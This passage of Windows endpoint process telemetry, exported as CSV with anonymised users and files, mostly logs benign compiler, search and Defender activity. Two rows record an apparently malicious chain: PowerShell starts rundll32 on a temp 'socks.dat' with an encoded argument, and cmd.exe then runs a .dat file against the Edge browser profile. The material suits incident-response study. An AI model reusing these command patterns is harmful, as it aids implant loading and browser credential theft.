20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1426,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:03.468886900+00:00,18184,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_eec2d18dbd53d000b28bf9957331465666c9b4d0.tmp"" ""c:\Windows\Temp\xffwvxv1\FilePII_165b45be0ea99ab69b45dc5188acbf98fb45b3db.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:14:03.394678400+00:00,12820,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\xffwvxv1\xffwvxv1.cmdline""",True,2021-06-23 01:13:57.533369300+00:00,11964,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:03.479604600+00:00,2021-06-23 01:15:27.770960900+00:00,9d7a385c-04e6-4e77-a6f0-16e744913821,computerpii_0a470890c60768167990033d701e7bd881398861,157178,False,10.7740.19041.1052,False,11540474045172239,,11540474045172240,2021-06-23 01:14:03.394678400+00:00,12820,2021-06-23 01:14:03.394678400+00:00,csc.exe,12820,16640,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 01:13:51.205808900+00:00,2019-12-07 09:10:35.992536100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1427,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:19:32.010655500+00:00,20684,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320849_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320849 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:19:32.487898800+00:00,2021-06-25 01:21:08.579194600+00:00,b0311765-4745-4494-af98-cd6435652a6b,computerpii_0a470890c60768167990033d701e7bd881398861,183191,False,10.7740.19041.1052,False,11540474045144190,,11540474045178712,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1428,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:19:56.277887100+00:00,19672,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\POI\FilePII_1b99f70131e48618f122d58e1157d6188dbbac98.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:00.068282600+00:00,15164,explorer.exe,Explorer.EXE,False,2021-06-25 00:38:59.791718800+00:00,20356,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:19:56.387843500+00:00,2021-06-25 01:21:08.580431300+00:00,b080fc71-ca7a-4a2b-a807-5d61fa6a17ea,computerpii_0a470890c60768167990033d701e7bd881398861,183222,False,10.7740.19041.1052,False,11540474045178163,,11540474045178721,2021-06-25 00:39:00.068282600+00:00,15164,2021-06-25 00:39:00.068282600+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,15164,18560,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-25 00:39:00.076466400+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,20481.0,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+1429,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:47:43.143867+00:00,20872,cmd.exe,"cmd.exe c:\users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\gco_p1.dat ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data\Default""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:43:06.596883700+00:00,16940,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",False,2021-06-25 00:41:52.923514800+00:00,19636,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:43.325171100+00:00,2021-06-25 00:49:48.301947900+00:00,e2b8dbac-d888-4ef1-86ca-64336a3c0728,computerpii_0a470890c60768167990033d701e7bd881398861,181887,False,10.7740.19041.1052,False,11540474045178371,,11540474045178453,2021-06-25 00:43:06.596883700+00:00,16940,2021-06-25 00:43:06.596883700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,16940,18560,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-25 00:43:06.585720800+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,0.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1430,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:47:43.154424800+00:00,10772,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:47:43.143867+00:00,20872,cmd.exe,"cmd.exe c:\users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\gco_p1.dat ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data\Default""",False,2021-06-25 00:43:06.596883700+00:00,16940,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:43.325515100+00:00,2021-06-25 00:49:48.301982+00:00,1a575b57-abac-4409-bcd6-20e9449d6a0e,computerpii_0a470890c60768167990033d701e7bd881398861,181888,False,10.7740.19041.1052,False,11540474045178453,,11540474045178454,2021-06-25 00:47:43.143867+00:00,20872,2021-06-25 00:47:43.143867+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,20872,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-25 00:39:25.482293800+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1431,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:37:03.077525600+00:00,18648,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""1164"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:37:03.236350500+00:00,2021-06-24 08:39:16.015562800+00:00,eb5ea1d2-b74f-4ff4-a33d-679ffb1ad139,computerpii_0a470890c60768167990033d701e7bd881398861,177713,False,10.7740.19041.1052,False,11540474045137006,,11540474045177380,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+1432,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:37:13.230219800+00:00,5008,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 08:37:03.077525600+00:00,18648,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""1164"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:37:13.309839100+00:00,2021-06-24 08:39:16.015668400+00:00,8ee8abc5-9ad8-4562-9448-0e9fae881928,computerpii_0a470890c60768167990033d701e7bd881398861,177715,False,10.7740.19041.1052,False,11540474045177380,,11540474045177386,2021-06-24 08:37:03.077525600+00:00,18648,2021-06-24 08:37:03.077525600+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,18648,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1433,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:37:13.230225200+00:00,5820,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '55ac3e59e2c2dd5964cb1760cab52db52c7ff7bbb2cb5e65ddf2ab4ad48043d3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 08:37:03.077525600+00:00,18648,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""1164"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:37:13.310001100+00:00,2021-06-24 08:39:16.015745200+00:00,f49a03cd-0952-48bc-bde7-ffd68709a524,computerpii_0a470890c60768167990033d701e7bd881398861,177716,False,10.7740.19041.1052,False,11540474045177380,,11540474045177387,2021-06-24 08:37:03.077525600+00:00,18648,2021-06-24 08:37:03.077525600+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,18648,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1434,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:37:13.230228+00:00,17840,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'fbfc5539be8807216f736a52ee593d6803721374427cf7786b7abb40e4bc4bdd')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 08:37:03.077525600+00:00,18648,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""1164"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:37:13.310171400+00:00,2021-06-24 08:39:16.015801800+00:00,dc76950c-523e-4b70-bf05-ff0e97a4b37e,computerpii_0a470890c60768167990033d701e7bd881398861,177717,False,10.7740.19041.1052,False,11540474045177380,,11540474045177388,2021-06-24 08:37:03.077525600+00:00,18648,2021-06-24 08:37:03.077525600+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,18648,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1435,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:37:13.239690800+00:00,1208,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 08:37:13.230228+00:00,17840,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'fbfc5539be8807216f736a52ee593d6803721374427cf7786b7abb40e4bc4bdd')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat 